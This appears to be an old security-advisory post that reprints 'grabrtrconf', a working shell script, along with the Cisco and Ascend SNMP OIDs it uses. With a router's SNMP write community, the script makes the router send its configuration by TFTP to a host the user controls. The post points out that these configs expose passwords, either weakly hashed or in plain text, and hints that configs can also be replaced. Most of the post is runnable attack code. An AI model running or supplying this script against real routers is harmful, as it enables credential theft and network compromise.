COMMAND
SNMP
SYSTEMS AFFECTED
routers
PROBLEM
Following was posted by 'monti'. The utility below is based on
widely known public information and it's functionality is
replicated in many very expensive commercial products. This
information is provided for educational purposes only. May this
script help make SNMP die the sad lonely death it deserves once
and for all!
On that note... Monty originally cobbled this together to keep
the network admins he worked with from doing annoying things like
keeping tftp daemons running on his Unix hosts for weeks on end.
Its pretty handy for that too. It's just a lame little script to
automate snmp/tftp config dumps from ciscos and ascends using
snmp/tftp with a temporary tftp server. There are several
home-grown versions of this for ciscos out there, a handful for
ascends, but have not run across any that do both, so... The
OID's to acomplish this on ciscos and ascends are below.
Basically in both cases doing an SNMP set on certain variables
will trigger the tftp config upload from the target router.
'XXX' denotes IP address octets for where you want the config to
go.
Cisco:
SNMP set .1.3.6.1.4.1.9.2.1.55.XXX.XXX.XXX.XXX type=s(string) "tftp-filename"
Ascend:
SNMP set .1.3.6.1.4.1.529.9.5.3.0 type=a(addr) XXX.XXX.XXX.XXX
SNMP set .1.3.6.1.4.1.529.9.5.4.0 type=s(string) "tftp-filename"
As everybody knows, Cisco type 7 hashes are trivial, and ascends
keep passwords unencrypted, so this tool or one of the zillion
others like it (HP Openview anybody?) could be used by crazed
frothy-mouthed sociopaths to dish out truckloads of evil upon
meek internet-shoppers!!!@!@#$!!! The code:
#!/bin/sh
# grabrtrconf:
# Pull router configs via tftp for cisco's and ascends. obviously trivial to
# modify this for other network hardware that supports this type of thing.
#
# - [type] can be one of cisco | ascend currently
# - defaults to cisco
# - requires cmu snmp utilities (snmpset specifically)
# - use TFTPLISTEN and disable tftp from /etc/inetd.conf if you want to
# launch a 'temporary' in.tftpd just to grab the file.
# - 'pidof' only exists on linux that I know of which kindof makes this a
# linux-only tool, unless/until I decide to stop relying on it.
# - Set 'INT' to whatever your routable IP is.
# - run as root (if you want to launch the tftp server)
#
# - I know this is lame... but it works (most of the time).
#
# by: Eric Monti 11/1997
#
TFTPLISTEN="true"
DIR=/tftpboot #might want to use something else
WAIT=6
INT=ppp0
test "$4" = "" && echo "Usage: `basename $0` target write-community tftphost filename [type]" && exit 1
TYPE=$5
test "$5" = "" && TYPE="cisco"
IPADDR=$3
test "$IPADDR" = "." && IPADDR=`/sbin/ifconfig $INT | grep inet | sed "s/\:/\ /" | awk '{print $3}'`
echo $3
if [ -n $TFTPLISTEN ];then
echo "tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd $DIR" > /tmp/ind.conf
/usr/sbin/inetd -d /tmp/ind.conf &
rm /tmp/ind.conf
rm -f $DIR/$4
touch $DIR/$4
chmod 666 $DIR/$4
fi
#CISCO get config
test "$TYPE" = "cisco" && \
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.9.2.1.55.$IPADDR s $4
#ASCEND get config
if [ "$TYPE" = "ascend" ];then
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a $IPADDR
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s $4
snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.1.0 i 3
snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a "0.0.0.0"
snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s ""
fi
sleep $WAIT
# i got lazy and used pidof... so what.
# I made pretty dots appear to make up for it!
if (test `pidof in.tftpd`);then
echo Receiving file:
while (test "`pidof in.tftpd`");do
echo -n .
sleep 1
done
echo
echo Transfer Complete
fi
if [ -n $TFTPLISTEN ];then
kill `cat /var/run/inetd.pid` # jeepers, i hope that wasnt the real1
fi
SOLUTION
As many know, it's worse too since you could just replace a config
if you're in the mood. The OID's to accomplish that can be found
in the respective cisco and ascend MIBs nearby the ones outlined
above. You won't find that in code above.